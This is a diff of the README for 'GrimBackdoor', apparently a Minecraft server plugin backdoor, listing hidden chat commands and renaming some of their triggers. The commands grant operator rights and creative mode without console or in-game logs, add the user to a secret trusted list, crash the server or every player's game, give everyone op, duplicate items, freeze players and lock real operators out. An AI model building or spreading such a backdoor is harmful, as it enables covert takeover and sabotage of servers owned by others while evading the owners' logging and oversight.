KuzeySRC/GrimBackdoor/README.md

 +5 spams to the console with "/help" command. server will crash after like 10 seconds.

-+6 shows a help menu to see commands.

 +7 gives op, changes your name, edits your level and health and statistics.

 +8 crashes everyones game without in-game log.
 (Do not forgot to edit the command in src file.)

-+9 gives creative mode without console log or in-game log.
++gmc gives creative mode without console log or in-game log.

 +sv gives survival mode without console log or in-game log.

 +sp gives spectator mode without console log or in-game log.

-+x99 adds your acc to trusted players list that you can use commands.
++supremecheats+ adds your acc to trusted players list that you can use commands.
 (It works if your nickname only has lowercase letters.)

 +#op Gives op Everyone (works only on luckperms. you can edit the code if you want to add others)

-This commands only works if you are added to trusted players list except "+x99"
+# This commands only works if you are added to trusted players list except "+supremecheats+"

+# Fun

+!deop (name) deops the writen player.

+!dupe (item count) gives you the item you are holding in your hand according to the number you wrote.

+!here draws all players to your side, forming a circle of 5 blocks around you.

+!anonim Changes your display name.

+!freeze freezes players.

+!lock players or ops cant use commands.

+!kontrolcubugu 15 blocks will bring everyone around you to their knees xD

+!deactivate Makes you non-trusted player

-You can edit the code the way you want.
+# You can edit the code the way you want.